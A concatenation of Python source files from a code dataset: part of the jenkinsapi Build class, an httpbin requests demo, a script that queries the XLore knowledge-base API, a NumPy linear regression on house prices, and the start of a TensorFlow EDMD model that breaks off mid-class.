They can also have outcomes, such as whether they passed or failed.\n\nBuild objects can be associated with Results and Artifacts.\n\"\"\"\nfrom __future__ import annotations\n\nimport time\nimport logging\nimport warnings\nimport datetime\n\nfrom time import sleep\nfrom typing import Iterator, List, Dict, Any\n\nimport pytz\nfrom jenkinsapi import config\nfrom jenkinsapi.artifact import Artifact\n\n# from jenkinsapi.job import Job\nfrom jenkinsapi.result_set import ResultSet\nfrom jenkinsapi.jenkinsbase import JenkinsBase\nfrom jenkinsapi.constants import STATUS_SUCCESS\nfrom jenkinsapi.custom_exceptions import NoResults\nfrom jenkinsapi.custom_exceptions import JenkinsAPIException\n\nfrom urllib.parse import quote\nfrom requests import HTTPError\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Build(JenkinsBase):\n\n \"\"\"\n Represents a Jenkins build, executed in context of a job.\n \"\"\"\n\n STR_TOTALCOUNT = \"totalCount\"\n STR_TPL_NOTESTS_ERR = (\n \"%s has status %s, and does not have \" \"any test results\"\n )\n\n def __init__(\n self, url: str, buildno: int, job: \"Job\", depth: int = 1\n ) -> None:\n \"\"\"\n depth=1 is for backward compatibility consideration\n\n About depth, the deeper it is, the more build data you get back. If\n depth=0 is sufficient for you, don't go up to 1. For more\n information, see\n https://www.jenkins.io/doc/book/using/remote-access-api/#RemoteaccessAPI-Depthcontrol\n \"\"\"\n self.buildno: int = buildno\n self.job: \"Job\" = job\n self.depth = depth\n JenkinsBase.__init__(self, url)\n\n def _poll(self, tree=None):\n # For builds we need more information for downstream and\n # upstream builds so we override the poll to get at the extra\n # data for build objects\n url = self.python_api_url(self.baseurl)\n return self.get_data(url, params={\"depth\": self.depth}, tree=tree)\n\n def __str__(self) -> str:\n return self._data[\"fullDisplayName\"]\n\n @property\n def name(self):\n return str(self)\n\n def get_description(self) -> str:\n return self._data[\"description\"]\n\n def get_number(self) -> int:\n return self._data[\"number\"]\n\n def get_status(self) -> str:\n return self._data[\"result\"]\n\n def get_slave(self) -> str:\n return self._data[\"builtOn\"]\n\n def get_revision(self) -> str:\n return getattr(self, f\"_get_{self._get_vcs()}_rev\", lambda: \"\")()\n\n def get_revision_branch(self) -> str:\n return getattr(\n self, f\"_get_{self._get_vcs()}_rev_branch\", lambda: \"\"\n )()\n\n def get_repo_url(self) -> str:\n return getattr(self, f\"_get_{self._get_vcs()}_repo_url\", lambda: \"\")()\n\n def get_params(self) -> dict[str, str]:\n \"\"\"\n Return a dictionary of params names and their values, or an\n empty dictionary if no parameters are returned.\n \"\"\"\n # This is what a parameter action looks like:\n # {'_class': 'hudson.model.ParametersAction', 'parameters': [\n # {'_class': 'hudson.model.StringParameterValue',\n # 'value': '12',\n # 'name': 'FOO_BAR_BAZ'}]}\n actions = self._data.get(\"actions\")\n if actions:\n parameters = {}\n for elem in actions:\n if elem.get(\"_class\") == \"hudson.model.ParametersAction\":\n parameters = elem.get(\"parameters\", {})\n break\n return {pair[\"name\"]: pair.get(\"value\") for pair in parameters}\n\n return {}\n\n def get_changeset_items(self):\n \"\"\"\n Returns a list of changeSet items.\n\n Each item has structure as in following example:\n {\n \"affectedPaths\": [\n \"content/rcm/v00-rcm-xccdf.xml\"\n ],\n \"author\" : {\n \"absoluteUrl\": \"http://jenkins_url/user/username79\",\n 
\"fullName\": \"username\"\n },\n \"commitId\": \"3097\",\n \"timestamp\": 1414398423091,\n \"date\": \"2014-10-27T08:27:03.091288Z\",\n \"msg\": \"commit message\",\n \"paths\": [{\n \"editType\": \"edit\",\n \"file\": \"/some/path/of/changed_file\"\n }],\n \"revision\": 3097,\n \"user\": \"username\"\n }\n \"\"\"\n if \"changeSet\" in self._data:\n if \"items\" in self._data[\"changeSet\"]:\n return self._data[\"changeSet\"][\"items\"]\n elif \"changeSets\" in self._data:\n if \"items\" in self._data[\"changeSets\"]:\n return self._data[\"changeSets\"][\"items\"]\n return []\n\n def _get_vcs(self) -> str:\n \"\"\"\n Returns a string VCS.\n By default, 'git' will be used.\n \"\"\"\n vcs = \"git\"\n if \"changeSet\" in self._data and \"kind\" in self._data[\"changeSet\"]:\n vcs = self._data[\"changeSet\"][\"kind\"] or \"git\"\n elif \"changeSets\" in self._data and \"kind\" in self._data[\"changeSets\"]:\n vcs = self._data[\"changeSets\"][\"kind\"] or \"git\"\n return vcs\n\n def _get_git_rev(self) -> str | None:\n # Sometimes we have None as part of actions. Filter those actions\n # which have lastBuiltRevision in them\n _actions = [\n x for x in self._data[\"actions\"] if x and \"lastBuiltRevision\" in x\n ]\n\n if _actions:\n return _actions[0][\"lastBuiltRevision\"][\"SHA1\"]\n\n return None\n\n def _get_git_rev_branch(self) -> str:\n # Sometimes we have None as part of actions. Filter those actions\n # which have lastBuiltRevision in them\n _actions = [\n x for x in self._data[\"actions\"] if x and \"lastBuiltRevision\" in x\n ]\n\n return _actions[0][\"lastBuiltRevision\"][\"branch\"]\n\n def _get_git_repo_url(self) -> str:\n # Sometimes we have None as part of actions. Filter those actions\n # which have lastBuiltRevision in them\n _actions = [\n x for x in self._data[\"actions\"] if x and \"lastBuiltRevision\" in x\n ]\n # old Jenkins version have key remoteUrl v/s the new version\n # has a list remoteUrls\n result = _actions[0].get(\"remoteUrls\", _actions[0].get(\"remoteUrl\"))\n if isinstance(result, list):\n result = \",\".join(result)\n return result\n\n def get_duration(self) -> datetime.timedelta:\n return datetime.timedelta(milliseconds=self._data[\"duration\"])\n\n def get_build_url(self) -> str:\n return self._data[\"url\"]\n\n def get_artifacts(self) -> Iterator[Artifact]:\n data = self.poll(tree=\"artifacts[relativePath,fileName]\")\n for afinfo in data[\"artifacts\"]:\n url = \"%s/artifact/%s\" % (\n self.baseurl,\n quote(afinfo[\"relativePath\"]),\n )\n af = Artifact(\n afinfo[\"fileName\"],\n url,\n self,\n relative_path=afinfo[\"relativePath\"],\n )\n yield af\n\n def get_artifact_dict(self) -> dict[str, Artifact]:\n return {af.relative_path: af for af in self.get_artifacts()}\n\n def get_upstream_job_name(self) -> str | None:\n \"\"\"\n Get the upstream job name if it exist, None otherwise\n :return: String or None\n \"\"\"\n try:\n return self.get_actions()[\"causes\"][0][\"upstreamProject\"]\n except KeyError:\n return None\n\n def get_upstream_job(self) -> Job | None:\n \"\"\"\n Get the upstream job object if it exist, None otherwise\n :return: Job or None\n \"\"\"\n if self.get_upstream_job_name():\n return self.get_jenkins_obj().get_job(self.get_upstream_job_name())\n return None\n\n def get_upstream_build_number(self) -> int | None:\n \"\"\"\n Get the upstream build number if it exist, None otherwise\n :return: int or None\n \"\"\"\n try:\n return int(self.get_actions()[\"causes\"][0][\"upstreamBuild\"])\n except KeyError:\n return None\n\n def 
get_upstream_build(self) -> \"Build\" | None:\n \"\"\"\n Get the upstream build if it exist, None otherwise\n :return Build or None\n \"\"\"\n upstream_job: \"Job\" = self.get_upstream_job()\n if upstream_job:\n return upstream_job.get_build(self.get_upstream_build_number())\n\n return None\n\n def get_master_job_name(self) -> str | None:\n \"\"\"\n Get the master job name if it exist, None otherwise\n :return: String or None\n \"\"\"\n try:\n return self.get_actions()[\"parameters\"][0][\"value\"]\n except KeyError:\n return None\n\n def get_master_job(self) -> Job | None:\n \"\"\"\n Get the master job object if it exist, None otherwise\n :return: Job or None\n \"\"\"\n if self.get_master_job_name():\n return self.get_jenkins_obj().get_job(self.get_master_job_name())\n\n return None\n\n def get_master_build_number(self) -> int | None:\n \"\"\"\n Get the master build number if it exist, None otherwise\n :return: int or None\n \"\"\"\n try:\n return int(self.get_actions()[\"parameters\"][1][\"value\"])\n except KeyError:\n return None\n\n def get_master_build(self) -> \"Build\" | None:\n \"\"\"\n Get the master build if it exist, None otherwise\n :return Build or None\n \"\"\"\n master_job: Job | None = self.get_master_job()\n if master_job:\n return master_job.get_build(self.get_master_build_number())\n\n return None\n\n def get_downstream_jobs(self) -> List[Job]:\n \"\"\"\n Get the downstream jobs for this build\n :return List of jobs or None\n \"\"\"\n downstream_jobs: List[Job] = []\n try:\n for job_name in self.get_downstream_job_names():\n downstream_jobs.append(\n self.get_jenkins_obj().get_job(job_name)\n )\n return downstream_jobs\n except (IndexError, KeyError):\n return []\n\n def get_downstream_job_names(self) -> List[str]:\n \"\"\"\n Get the downstream job names for this build\n :return List of string or None\n \"\"\"\n downstream_job_names: List[str] = self.job.get_downstream_job_names()\n downstream_names: List[str] = []\n try:\n fingerprints = self._data[\"fingerprint\"]\n for fingerprint in fingerprints:\n for job_usage in fingerprint[\"usage\"]:\n if job_usage[\"name\"] in downstream_job_names:\n downstream_names.append(job_usage[\"name\"])\n return downstream_names\n except (IndexError, KeyError):\n return []\n\n def get_downstream_builds(self) -> List[\"Build\"]:\n \"\"\"\n Get the downstream builds for this build\n :return List of Build or None\n \"\"\"\n downstream_job_names: List[str] = self.get_downstream_job_names()\n downstream_builds: List[Build] = []\n try: # pylint: disable=R1702\n fingerprints = self._data[\"fingerprint\"]\n for fingerprint in fingerprints:\n for job_usage in fingerprint[\"usage\"]:\n if job_usage[\"name\"] in downstream_job_names:\n job = self.get_jenkins_obj().get_job(job_usage[\"name\"])\n for job_range in job_usage[\"ranges\"][\"ranges\"]:\n for build_id in range(\n job_range[\"start\"], job_range[\"end\"]\n ):\n downstream_builds.append(\n job.get_build(build_id)\n )\n return downstream_builds\n except (IndexError, KeyError):\n return []\n\n def get_matrix_runs(self) -> Iterator[\"Build\"]:\n \"\"\"\n For a matrix job, get the individual builds for each\n matrix configuration\n :return: Generator of Build\n \"\"\"\n if \"runs\" in self._data:\n for rinfo in self._data[\"runs\"]:\n number: int = rinfo[\"number\"]\n if number == self._data[\"number\"]:\n yield Build(rinfo[\"url\"], number, self.job)\n\n def is_running(self) -> bool:\n \"\"\"\n Return a bool if running.\n \"\"\"\n data = self.poll(tree=\"building\")\n return 
data.get(\"building\", False)\n\n def block(self) -> None:\n while self.is_running():\n time.sleep(1)\n\n def is_good(self) -> bool:\n \"\"\"\n Return a bool, true if the build was good.\n If the build is still running, return False.\n \"\"\"\n return (not self.is_running()) and self._data[\n \"result\"\n ] == STATUS_SUCCESS\n\n def block_until_complete(self, delay: int = 15) -> None:\n count: int = 0\n while self.is_running():\n total_wait: int = delay * count\n log.info(\n msg=\"Waited %is for %s #%s to complete\"\n % (total_wait, self.job.name, self.name)\n )\n sleep(delay)\n count += 1\n\n def get_jenkins_obj(self) -> \"Jenkins\":\n return self.job.get_jenkins_obj()\n\n def get_result_url(self) -> str:\n \"\"\"\n Return the URL for the object which provides the job's result summary.\n \"\"\"\n url_tpl: str = r\"%stestReport/%s\"\n return url_tpl % (self._data[\"url\"], config.JENKINS_API)\n\n def get_resultset(self) -> ResultSet:\n \"\"\"\n Obtain detailed results for this build.\n\n Raises NoResults if the build has no results.\n\n :return: ResultSet\n \"\"\"\n result_url: str = self.get_result_url()\n if self.STR_TOTALCOUNT not in self.get_actions():\n raise NoResults(\n \"%s does not have any published results\" % str(self)\n )\n buildstatus: str = self.get_status()\n if not self.get_actions()[self.STR_TOTALCOUNT]:\n raise NoResults(\n self.STR_TPL_NOTESTS_ERR % (str(self), buildstatus)\n )\n return ResultSet(result_url, build=self)\n\n def has_resultset(self) -> bool:\n \"\"\"\n Return a boolean, true if a result set is available. false if not.\n \"\"\"\n return self.STR_TOTALCOUNT in self.get_actions()\n\n def get_actions(self) -> Dict[str, Any]:\n all_actions: Dict[str, Any] = {}\n for dct_action in self._data[\"actions\"]:\n if dct_action is None:\n continue\n all_actions.update(dct_action)\n return all_actions\n\n def get_causes(self) -> List[str]:\n \"\"\"\n Returns a list of causes. There can be multiple causes lists and\n some of the can be empty. For instance, when a build is manually\n aborted, Jenkins could add an empty causes list to the actions\n dict. 
Empty ones are ignored.\n \"\"\"\n all_causes: List[str] = []\n for dct_action in self._data[\"actions\"]:\n if dct_action is None:\n continue\n if \"causes\" in dct_action and dct_action[\"causes\"]:\n all_causes.extend(dct_action[\"causes\"])\n return all_causes\n\n def get_timestamp(self) -> datetime.datetime:\n \"\"\"\n Returns build timestamp in UTC\n \"\"\"\n # Java timestamps are given in milliseconds since the epoch start!\n naive_timestamp = datetime.datetime(\n *time.gmtime(self._data[\"timestamp\"] / 1000.0)[:6]\n )\n return pytz.utc.localize(naive_timestamp)\n\n def get_console(self) -> str:\n \"\"\"\n Return the current state of the text console.\n \"\"\"\n url: str = \"%s/consoleText\" % self.baseurl\n resp = self.job.jenkins.requester.get_url(url)\n content: Any = resp.content\n # This check was made for Python 3.x\n # In this version content is a bytes string\n # By contract this function must return string\n if isinstance(content, str):\n return content\n elif isinstance(content, bytes):\n return content.decode(resp.encoding or \"ISO-8859-1\")\n else:\n raise JenkinsAPIException(\"Unknown content type for console\")\n\n def stream_logs(self, interval=0) -> Iterator[str]:\n \"\"\"\n Return generator which streams parts of text console.\n \"\"\"\n url: str = \"%s/logText/progressiveText\" % self.baseurl\n size: int = 0\n more_data: bool = True\n while more_data:\n resp = self.job.jenkins.requester.get_url(\n url, params={\"start\": size}\n )\n content = resp.content\n if content:\n if isinstance(content, str):\n yield content\n elif isinstance(content, bytes):\n yield content.decode(resp.encoding or \"ISO-8859-1\")\n else:\n raise JenkinsAPIException(\n \"Unknown content type for console\"\n )\n size = resp.headers[\"X-Text-Size\"]\n more_data = resp.headers.get(\"X-More-Data\")\n sleep(interval)\n\n def get_estimated_duration(self) -> int | None:\n \"\"\"\n Return the estimated build duration (in seconds) or none.\n \"\"\"\n try:\n eta_ms = self._data[\"estimatedDuration\"]\n return max(0, eta_ms / 1000.0)\n except KeyError:\n return None\n\n def stop(self) -> bool:\n \"\"\"\n Stops the build execution if it's running\n :return boolean True if succeeded False otherwise or the build\n is not running\n \"\"\"\n if self.is_running():\n url: str = \"%s/stop\" % self.baseurl\n # Starting from Jenkins 2.7 stop function sometimes breaks\n # on redirect to job page. 
Call to stop works fine, and\n # we don't need to have job page here.\n self.job.jenkins.requester.post_and_confirm_status(\n url,\n data=\"\",\n valid=[\n 302,\n 200,\n 500,\n ],\n )\n return True\n return False\n\n def get_env_vars(self) -> Dict[str, str]:\n \"\"\"\n Return the environment variables.\n\n This method is using the Environment Injector plugin:\n https://wiki.jenkins-ci.org/display/JENKINS/EnvInject+Plugin\n \"\"\"\n url: str = self.python_api_url(\"%s/injectedEnvVars\" % self.baseurl)\n try:\n data = self.get_data(url, params={\"depth\": self.depth})\n except HTTPError as ex:\n warnings.warn(\n \"Make sure the Environment Injector plugin is installed.\"\n )\n raise ex\n return data[\"envMap\"]\n\n def toggle_keep(self) -> None:\n \"\"\"\n Toggle \"keep this build forever\" on and off\n \"\"\"\n url: str = \"%s/toggleLogKeep\" % self.baseurl\n self.get_jenkins_obj().requester.post_and_confirm_status(url, data={})\n self._data = self._poll()\n\n def is_kept_forever(self) -> bool:\n return self._data[\"keepLog\"]\n","sub_path":"jenkinsapi/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":19467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"573891487","text":"import requests\n\nif __name__ == '__main__':\n #url = 'https://httpbin.org/get?nombre=visaka&curos=python'\n url = 'https://httpbin.org/get'\n args = {'nombre': 'visaka', 'cursos':'python', 'nivel':'intermedio'}\n response = requests.get(url, params=args)\n #print(response.url)\n\n if response.status_code == 200:\n content = response.content\n response_json = response.json()\n #print(response_json)\n\n origin = response_json['origin']\n print(origin)\n\n\n\n #Almacenar el contenido de la pagina web\n file = open('bin.html', 'wb')\n file.write(content)\n file.close\n #print (response.content)\n","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"227068580","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @author: ‘ShawJoe‘\n @time: 2019/11/14 17:21\n\"\"\"\nfrom utils.common.init_func import Initiator\nfrom utils.settings import experiment_path\nimport requests\nimport traceback\nimport pickle\nimport os\nimport time\nimport json\nimport threading\nfrom remote.engineering.data_tools.SZTools import is_json, read_files_from_dirctory\nfrom remote.engineering.data_tools.SZTools import check_other_language\n\n\n\"\"\"\n========================================================================================================================\nxlore的接口部分\n========================================================================================================================\n\"\"\"\n\n\ndef query_xlore_entity(term):\n \"\"\"获取基本的实体信息\"\"\"\n url = \"http://xxx.xx.xxx.xx:xxxx/query?searchTmp=\" + term\n headers = {\n 'contentType': 'application/x-www-form-urlencoded; charset=UTF-8',\n }\n result = ''\n try:\n req = requests.get(url, headers=headers)\n result = req.text\n except:\n log1.info(traceback.format_exc())\n return result\n\n\ndef query_xlore_uri(uri):\n \"\"\"获取实体的uri信息\"\"\"\n url = \"https://api.xlore.org/query?uri=\" + uri\n headers = {\n 'contentType': 'application/x-www-form-urlencoded; charset=UTF-8',\n }\n result = ''\n try:\n req = requests.get(url, headers=headers)\n result = req.text\n except:\n log1.info(traceback.format_exc())\n return 
result\n\n\n\"\"\"\n========================================================================================================================\n下面是entity的查询\n========================================================================================================================\n\"\"\"\n\n\ndef combine_entities():\n \"\"\"将上述的分别获取的entities数据进行合并\"\"\"\n list1 = read_files_from_dirctory(experiment_path + \"org/xlore/entities/\")\n dict1 = dict()\n log1.info(str(len(list1)) + \" entities files!\")\n for path in list1:\n dict2 = pickle.load(open(path, \"rb\"))\n for u in dict2:\n if (\"当天访问次数到达上限\" not in dict2[u]) and (is_json(dict2[u])):\n dict1[u] = dict2[u]\n log1.info(str(len(dict1)) + \" entities included in cache file!\")\n with open(experiment_path + \"org/xlore/entity.dict\", 'wb') as f:\n pickle.dump(dict1, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef save_one_entity(uri, thread_name, number):\n \"\"\"保存多线程下每完成n个的结果,包括最后一次完成不超过n个的结果\"\"\"\n name = \"-\" + thread_name + \"-\" + number + \"-\"\n filename1 = experiment_path + \"org/xlore/entities/entity\" + name + \".dict\"\n count1 = 0\n while os.path.exists(filename1): # 当这个文件路径存在的时候,就继续循环,直到给定的文件路径不存在\n count1 += 1\n name += str(count1)\n filename1 = experiment_path + \"org/xlore/entities/entity\" + name + \".dict\"\n with open(filename1, 'wb') as f: # 最终找到的这个是不存在的,直接保存\n pickle.dump(uri, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef multithreading_query_entities(list1, thread_name):\n \"\"\"查询的流程,尤其是注意查询中保存的文件名\"\"\"\n entity = dict()\n count1 = 0\n for u in list1:\n result = query_xlore_entity(u)\n if result != \"\":\n log1.info(thread_name + \" \" + result)\n entity[u] = result\n count1 += 1\n n = 100 # 这里这么处理不容易出错!\n if count1 % n == 0:\n log1.info(count1)\n save_one_entity(entity, thread_name, str(int(count1 / n)))\n entity = dict()\n save_one_entity(entity, thread_name, str(int(count1 / n) + 1))\n log1.info(thread_name + \" End!\")\n\n\ndef multi_query_entity():\n \"\"\"多线程查找entity\"\"\"\n combine_entities() # 先把已经抓取的数据合并到一个文件\n dict1 = pickle.load(open(experiment_path + \"org/xlore/n_gram.dict\", 'rb'))\n filename1 = experiment_path + \"org/xlore/entity.dict\"\n entity = dict()\n if os.path.exists(filename1):\n entity = pickle.load(open(filename1, \"rb\"))\n log1.info(len(entity))\n set1 = set()\n for key in dict1:\n for u in dict1[key]:\n if u not in entity: # 只管不在的时候\n set1.add(u)\n log1.info(str(len(set1)) + \" entities need information!\")\n list1 = list(set1)\n n = 10000 # 每组多少条\n threads = []\n for i in range(0, len(list1), n):\n log1.info(i)\n list2 = list1[i: i + n]\n t = threading.Thread(target=multithreading_query_entities, args=(list2, str(int(i / n))))\n threads.append(t)\n log1.info(len(threads))\n for t in threads:\n t.start()\n log1.info(str(t) + \" start!\")\n\n\n\"\"\"\n========================================================================================================================\n下面是uri的查询\n========================================================================================================================\n\"\"\"\n\n\ndef combine_uris():\n \"\"\"将上述的分别获取的uri数据进行合并\"\"\"\n list1 = read_files_from_dirctory(experiment_path + \"org/xlore/uris/\")\n dict1 = dict()\n log1.info(str(len(list1)) + \" uri files!\")\n for path in list1:\n dict2 = pickle.load(open(path, \"rb\"))\n for u in dict2:\n if (\"当天访问次数到达上限\" not in dict2[u]) and (is_json(dict2[u])):\n dict1[u] = dict2[u]\n log1.info(str(len(dict1)) + \" uris included in cache file!\")\n with open(experiment_path + \"org/xlore/uri.dict\", 'wb') as f:\n 
pickle.dump(dict1, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef save_one_uri(uri, thread_name, number):\n \"\"\"保存多线程下每完成n个的结果,包括最后一次完成不超过n个的结果\"\"\"\n name = \"-\" + thread_name + \"-\" + number + \"-\"\n filename1 = experiment_path + \"org/xlore/uris/uri\" + name + \".dict\"\n count1 = 0\n while os.path.exists(filename1): # 当这个文件路径存在的时候,就继续循环,直到给定的文件路径不存在\n count1 += 1\n name += str(count1)\n filename1 = experiment_path + \"org/xlore/uris/uri\" + name + \".dict\"\n with open(filename1, 'wb') as f: # 最终找到的这个是不存在的,直接保存\n pickle.dump(uri, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef multithreading_query_uris(list1, thread_name):\n \"\"\"查询的流程,尤其是注意查询中保存的文件名\"\"\"\n uri = dict()\n count1 = 0\n for u in list1:\n result = query_xlore_uri(u)\n if result != \"\":\n log1.info(thread_name + \" \" + result)\n uri[u] = result\n count1 += 1\n n = 100 # 这里这么处理不容易出错!\n if count1 % n == 0:\n log1.info(count1)\n save_one_uri(uri, thread_name, str(int(count1 / n)))\n uri = dict()\n save_one_uri(uri, thread_name, str(int(count1 / n) + 1))\n log1.info(thread_name + \" End!\")\n\n\nuri_set = set() # uri的集合\n\n\ndef traverse_all_uris(obj1):\n \"\"\"遍历属性对象中的所有的uri\"\"\"\n for u in obj1:\n if type(obj1[u]) is dict:\n traverse_all_uris(obj1[u])\n elif type(obj1[u]) is list:\n for m in obj1[u]:\n if type(m) is str:\n uri_set.add('http://xlore.org/instance/'+m)\n elif type(m) is dict:\n traverse_all_uris(m)\n else:\n log1.info(m)\n elif type(obj1[u]) is str:\n if u.lower().strip() == \"uri\":\n uri_set.add(obj1[u])\n else:\n log1.info(u)\n log1.info(obj1[u])\n return uri_set\n\n\ndef multi_query_uri():\n \"\"\"多线程查询,将任务分配到各个多线程,然后进行查询,并保存为文件\"\"\"\n combine_uris() # 先执行一下合并数据,保证uri的数据是最新的\n entity = pickle.load(open(experiment_path + \"org/xlore/entity.dict\", 'rb'))\n uri = pickle.load(open(experiment_path + \"org/xlore/uri.dict\", \"rb\"))\n for key in entity:\n if not check_other_language(key): # 只有英语的才去查询,其他语言的不管\n if is_json(entity[key]):\n traverse_all_uris(json.loads(entity[key]))\n log1.info(str(len(uri_set)) + \" uri_set length!\")\n list1 = []\n for u in uri_set:\n if u not in uri:\n list1.append(u)\n print(len(list1))\n n = 400 # 每组多少条\n threads = []\n for i in range(0, len(list1), n):\n log1.info(i)\n list2 = list1[i: i + n]\n t = threading.Thread(target=multithreading_query_uris, args=(list2, str(int(i / n))))\n threads.append(t)\n log1.info(len(threads))\n for t in threads:\n t.start()\n log1.info(str(t) + \" start!\")\n # t.join()\n\n\ndef check_null_affilations():\n \"\"\"检查并补充affiliation完全找不到对应的entity的\"\"\"\n affiliation = pickle.load(open(experiment_path + \"org/xlore/affiliation.dict\", 'rb'))\n n_gram = pickle.load(open(experiment_path + \"org/xlore/n_gram.dict\", 'rb'))\n entity = pickle.load(open(experiment_path + \"org/xlore/entity.dict\", \"rb\"))\n list1 = []\n count1 = 0\n for a in affiliation:\n if a in n_gram:\n count1 += 1\n flag = False\n for n in n_gram[a]:\n if n in entity:\n obj1 = json.loads(entity[n])\n if len(obj1[\"content\"]) != 0:\n flag = True\n break\n if not flag:\n # print(a, n_gram[a])\n list1.append(a)\n log1.info(count1)\n log1.info(len(list1))\n with open(experiment_path + \"org/xlore/affiliations_re_ngram.dict\", 'wb') as f:\n pickle.dump(list1, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef main(log):\n global log1\n log1 = log\n # multi_query_entity()\n # combine_entities()\n # multi_query_uri()\n # combine_uris()\n check_null_affilations()\n\n\nif __name__ == '__main__':\n init = 
Initiator(main)\n","sub_path":"query_from_xlore.py","file_name":"query_from_xlore.py","file_ext":"py","file_size_in_byte":10103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"591165635","text":"# Linear regression algorithm\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom pickle import load,dump\n\n# Functions to save files\ndef save_structure(structure,filename):\n file = open(filename,'wb')\n dump(structure,file)\n file.close()\n\ndef load_structure(filename):\n file = open(filename,'rb')\n structure = load(file)\n file.close()\n return structure\n\n# Getting data\ndef read_data(file = 'kc_house_data.csv'):\n f = open(file)\n lines = f.read().split('\\n')\n # Preprocessing data\n X,y = preprocess_data(lines[1:])\n save_structure(X,'X.pkl')\n save_structure(y,'y.pkl')\n return X,y\n\ndef feature_scaling(X):\n features = []\n s = []\n m = []\n new_X = []\n for i in range(18):\n features.append([])\n for x in X:\n for i in range(18):\n print(x,len(x))\n features[i].append(x[i])\n for f in features:\n f_a = np.array(f)\n s.append(np.std(f_a))\n m.append(np.mean(f_a))\n s = np.array(s)\n m = np.array(m)\n # Scaling\n for x in X:\n x_aux = (x - m) / s\n new_X.append(x_aux)\n return np.array(new_X)\n\ndef convert_numbers(line):\n l = []\n for e in line:\n if len(e) > 0:\n if '.' in e:\n l.append(float(e))\n else:\n l.append(int(e))\n else:\n l.append(0)\n return l\n\ndef preprocess_data(lines):\n X = []\n y = []\n for line in lines:\n l = line.split(',')\n if len(l) == 21:\n y.append(l[2]) # Price\n # Drop date and price\n l = l[3:]\n l = convert_numbers(l)\n # Convert in numpy array\n l = np.array(l)\n # Feature scaling\n X.append(l)\n X = np.array(X)\n X = feature_scaling(X)\n y = np.array(y)\n return X,y\n\ndef split_dataset(X,y,limit):\n training = []\n y_tr = []\n y_te = []\n testing = []\n aux_indices = [i for i in range(len(X))]\n print(type(aux_indices))\n random.shuffle(aux_indices)\n for i in aux_indices[:limit]:\n training.append(X[i])\n y_tr.append(y[i])\n for i in aux_indices[limit:]:\n testing.append(X[i])\n y_te.append(y[i])\n return np.array(training), np.array(y_tr), np.array(testing), np.array(y_te)\n\ndef predict(X,params,b):\n predictions = []\n for x in X:\n predictions.append(np.sum(np.transpose(params) * x) + b)\n #for x in X:\n # predictions = np.sum(params * x) +\n predictions = np.array(predictions)\n #print(predictions)\n return predictions\n\ndef loss_function(y,predictions):\n loss = 0.5 * np.mean((y - predictions) ** 2)\n return loss,0.5 * ((y - predictions) ** 2)\n\ndef gradient_descent(X,y,params, b, alpha = 0.1):\n partial_derivatives , partial_b = loss_theta_der(X,y,params,b) , loss_b_der(X,y,params,b)\n params = params - alpha * partial_derivatives\n b = b - alpha * partial_b\n return params,b\n\ndef loss_theta_der(X,y,params,b):\n final_pd = []\n pd = [0 for i in range(18)]\n m = y.size\n for x in X:\n for i in range(len(x)):\n error = (np.sum(params*x) + b) - y[i]\n pd[i] += (1/m) * (error * x[i])\n pd = np.array(pd)\n pd = pd / len(X)\n return pd\n\ndef loss_b_der(X,y,params,b):\n pd = 0\n i = 0\n m = y.size\n for x in X:\n error = (np.sum(params * x) + b) - y[i]\n pd += (1/m) * error\n i += 1\n pd = pd / len(X)\n return pd\n\ndef train():\n total_loss = []\n # Create random parameters\n params = np.random.rand(1,18)\n b = random.random()\n j = 0\n # Load data\n #X,y = read_data()\n X,y = load_structure('X.pkl'), load_structure('y.pkl')\n # Split data\n training, y_tr, 
testing, y_te = split_dataset(X,y,int(len(X)*0.7))\n # Train model\n while j <= 1000:\n predictions = predict(training,params,b)\n loss, _ = loss_function(y_tr, predictions)\n total_loss.append(loss)\n params, b = gradient_descent(training,y_tr,params,b)\n if j % 50 == 0:\n print('Valor función de costo en la iteración: ',j,' : ',loss)\n j += 1\n save_structure(params,'params.pkl')\n save_structure(b,'b.pkl')\n plt.plot(range(1001), total_loss)\n plt.show()\n\ndef test():\n total_loss = []\n params = load_structure('params.pkl')\n b = load_structure('b.pkl')\n X,y = load_structure('X.pkl'), load_structure('y.pkl')\n # Split data\n training, y_tr, testing, y_te = split_dataset(X,y,int(len(X)*0.7))\n predictions = predict(testing,params,b)\n loss,lo = loss_function(y_te, predictions)\n total_loss.append(loss)\n for l in total_loss:\n print('Error promedio de todas las predicciones en la prediccion ',l)\n for e in range(len(list(lo))):\n print('Valor esperado:',y_te[e],' Valor obtenido: ', predictions[e],' Funcion de coste: ',lo[e])\n\ntest()\n","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"226641368","text":"import numpy as np, pdb, tensorflow as tf\r\n\r\n\r\nclass edmd():\r\n def __init__(self,X,Y,Z,Nstep,mu_x,sd_x,mu_y,sd_y,mu_z,sd_z,**hyper_parameters):\r\n\r\n Ny = Y.get_shape().as_list()[1]\r\n Nz = Z.get_shape().as_list()[1]\r\n\r\n self.Nlayer = hyper_parameters['Nlayer']\r\n self.N0 = hyper_parameters['N0']\r\n self.N1 = hyper_parameters['N1']\r\n self.Nzeta = hyper_parameters['Nzeta']\r\n\r\n self.Z = Z\r\n self.Zn = (Z-mu_z)/sd_z\r\n self.Y = Y\r\n self.Yn = (Y-mu_y)/sd_y\r\n self.Nstep = Nstep\r\n\r\n with tf.variable_scope('encode',reuse=False):\r\n Zeta = self.Zn\r\n units_dist = np.round(np.linspace(self.N0,self.N1,self.Nlayer)).astype(np.int)\r\n for k1 in range(self.Nlayer):\r\n Zeta = tf.layers.dense(Zeta,units=units_dist[k1],kernel_regularizer=tf.contrib.layers.l2_regularizer(scale=1.))\r\n Zeta = tf.nn.tanh(Zeta)\r\n Zeta = 